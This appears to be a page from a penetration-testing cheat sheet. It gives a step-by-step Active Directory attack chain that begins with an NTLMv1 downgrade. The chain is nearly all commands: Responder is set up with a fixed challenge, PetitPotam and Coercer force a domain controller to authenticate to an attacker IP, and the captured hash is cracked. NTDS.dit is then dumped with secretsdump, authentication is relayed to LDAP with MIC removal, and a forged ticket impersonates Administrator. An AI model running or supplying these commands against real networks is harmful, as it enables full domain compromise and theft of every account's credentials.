NTLMv1

Add the following line to Responder.conf

; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788

Run Responder

sudo responder -I <network interface> --lm --disable-ess

Run coercer

# e.g. https://github.com/topotam/PetitPotam
python3 Petitpotam.py <listener IP> <target DC IP> -u <USERNAME> -p <PASSWORD>

Crack NTLMv1 hash for the coerced computer account

# https://ntlmv1.com
Enter the first hash after the domain : e.g. DC01$::<FQDN>:<NTHASH>

Dump NTDS.dit using machine NTLM hash

impacket-secretsdump -hashes ':<MACHINE HASH>' '<FQDN>/<HOSTNAME>'@<DC-IP>

Relay authentication to LDAP from first to second DC

impacket-ntlmrelayx -t ldap://<DC1-IP> --remove-mic -smb2support --delegate-access

Force authentication

coercer coerce -d '<DOMAIN-FQDN>' -u '<USERNAME>' -p '<PASSWORD>' -t '<DC2-IP>' -l '<ATTACKER-IP>'

Create silver ticket

impacket-getST <DOMAIN-FQDN>/'<COMPUTER-NAME>$':'<COMPUTER-PASSWORD>' -spn cifs/<DC-HOSTNAME>.<DOMAIN-FQDN> -impersonate Administrator -dc-ip <DC-IP>

Dump NTDS NTLM hashes

impacket-secretsdump <DOMAIN-FQDN>/administrator@<DC-HOSTNAME>.<DOMAIN-FQDN> -k -no-pass -dc-ip <DC-IP> -just-dc-ntlm

Last updated 5 days ago